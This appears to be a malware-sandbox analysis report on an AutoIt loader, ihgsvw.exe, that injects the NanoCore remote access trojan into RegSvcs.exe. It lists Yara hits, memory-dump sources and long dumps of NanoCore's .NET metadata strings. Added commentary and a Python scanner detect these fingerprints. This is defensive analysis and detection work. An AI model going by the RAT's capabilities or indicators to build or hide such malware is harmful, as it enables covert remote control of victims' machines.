      Source: Yara match | File source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
      Source: ihgsvw.exe; Binary or memory string: WIN_81
      Source: ihgsvw.exe; Binary or memory string: WIN_XP
      Source: ihgsvw.exe, 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp; Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
      Source: ihgsvw.exe; Binary or memory string: WIN_XPe
      Source: ihgsvw.exe; Binary or memory string: WIN_VISTA
      Source: ihgsvw.exe; Binary or memory string: WIN_7
      Source: ihgsvw.exe; Binary or memory string: WIN_8
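      The OS-version strings above (WIN_XP through WIN_11, back to back in exactly that order, next to @GUI_DRAGID and the PCRE option names) are the AutoIt interpreter's own @OSVersion table, so they identify ihgsvw.exe as a compiled AutoIt loader rather than showing OS-targeting logic in the script itself. The NanoCore.ClientPluginHost, NanoProtectClient and ClientPlugin.dll names listed under Remote Access Functionality below are .NET metadata from the NanoCore plugin SDK found in the memory of RegSvcs.exe, the process the loader injects into. The Python scanner below is an added example written for this page, not Joe Sandbox code and not part of the report: it extracts ASCII and UTF-16LE strings from a raw dump the way the "String found in binary or memory" rows do, checks for the AutoIt compiled-script marker AU3!EA06 and the OS table run, and scores the NanoCore names so that a lone ClientPlugin.dll does not produce a verdict. The per-name weights, the threshold of 4 and the sample buffer are this example's assumptions.

```python
"""Scan a memory dump or unpacked PE image for the two string families this
report quotes: the AutoIt runtime's @OSVersion table (a compiled AutoIt
loader) and NanoCore plugin-SDK .NET metadata names (the injected client).
Example code written for this page; weights/threshold are assumptions."""
import re
from dataclasses import dataclass

# Marker every AutoIt v3 compiled script carries in its script resource.
AUTOIT_SCRIPT_MARKER = "AU3!EA06"

# @OSVersion values exactly as they sit back to back in the AutoIt runtime's
# string table; the report quotes this run from ihgsvw.exe. It belongs to the
# interpreter, so it proves "compiled AutoIt", not OS-fingerprinting logic.
AUTOIT_OSVERSION_RUN = (
    "WIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8"
    "WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XP"
)

# .NET names from the NanoCore client/plugin SDK that the report lists in
# RegSvcs.exe memory, with assumed weights: interface/namespace names are
# specific, a bare assembly file name such as ClientPlugin.dll is weak alone.
NANOCORE_NAMES = {
    "NanoCore.ClientPluginHost": 3,
    "NanoCore.ClientPlugin": 3,
    "IClientNetworkHost": 2,
    "IClientLoggingHost": 2,
    "NanoProtectClient": 2,
    "KillNanoCore": 2,
    "[NanoProtect]": 2,
    "ClientPlugin.dll": 1,
}
NANOCORE_THRESHOLD = 4  # assumed: one strong name or several weak ones

# Identifier boundary so "NanoCore.ClientPlugin" is not also counted inside
# "NanoCore.ClientPluginHost".
_NAME_RE = {n: re.compile(re.escape(n) + r"(?![A-Za-z0-9_])") for n in NANOCORE_NAMES}


def extract_strings(buf: bytes, min_len: int = 6) -> list:
    """Like `strings -e s` plus `strings -e l`: printable ASCII runs and
    UTF-16LE runs (the .NET #US heap stores user strings as UTF-16)."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(buf)]
    found += [m.group().decode("utf-16-le") for m in wide_re.finditer(buf)]
    return found


@dataclass
class ScanResult:
    autoit_marker: bool
    autoit_osversion_table: bool
    nanocore_hits: dict   # name -> occurrences
    nanocore_score: int

    @property
    def is_autoit(self) -> bool:
        return self.autoit_marker or self.autoit_osversion_table

    @property
    def is_nanocore(self) -> bool:
        return self.nanocore_score >= NANOCORE_THRESHOLD


def scan_buffer(buf: bytes) -> ScanResult:
    """Run both fingerprints over one dump. Extracted strings are joined with
    newlines so two separate strings can never be stitched into one name."""
    text = "\n".join(extract_strings(buf))
    hits = {n: len(rx.findall(text)) for n, rx in _NAME_RE.items()}
    hits = {n: c for n, c in hits.items() if c}
    return ScanResult(
        autoit_marker=AUTOIT_SCRIPT_MARKER in text,
        autoit_osversion_table=AUTOIT_OSVERSION_RUN in text,
        nanocore_hits=hits,
        nanocore_score=sum(NANOCORE_NAMES[n] for n in hits),
    )


def scan_file(path: str) -> ScanResult:
    """Scan a .sdmp, an unpacked PE, or any raw dump from disk."""
    with open(path, "rb") as fh:
        return scan_buffer(fh.read())


def build_sample() -> bytes:
    """Constructed test input (not data from the report): binary filler, an
    AutoIt marker plus OS table, a NanoCore-like .NET #Strings heap with
    NUL-separated entries, and one UTF-16 user string."""
    filler = bytes(range(256)) * 4
    autoit = (b"\x00" * 16 + AUTOIT_SCRIPT_MARKER.encode() + b"\x00" * 16
              + b"X86IA64X64WIN32_NT" + AUTOIT_OSVERSION_RUN.encode() + b"InstallLanguage\x00")
    heap = b"\x00".join([
        b"<Module>", b"mscorlib", b"Microsoft.VisualBasic", b"NanoCore.ClientPluginHost",
        b"IClientNetworkHost", b"IClientLoggingHost", b"NanoCore.ClientPlugin",
        b"NanoProtectClient", b"KillNanoCore", b"ClientPlugin.dll", b"NanoProtectClient.dll",
    ]) + b"\x00"
    user = "[NanoProtect]: Checking for NanoProtect module..".encode("utf-16-le")
    return filler + autoit + filler + heap + filler + user + filler


if __name__ == "__main__":
    r = scan_buffer(build_sample())
    print(f"AutoIt: {r.is_autoit}  NanoCore: {r.is_nanocore} (score {r.nanocore_score})")
    for name, n in sorted(r.nanocore_hits.items()):
        print(f"  {n}x {name}")
```

      Point scan_file() at one of the .sdmp dumps or unpacked PE images named in this report. Treating the OS table as a loader fingerprint and requiring more than a single SDK name is what keeps the scanner from flagging every AutoIt binary or every .NET plugin host it meets.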

      Remote Access Functionality

      Source: ihgsvw.exe, 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssem
blyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordA
ttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssem
blyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: ihgsvw.exe, 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemove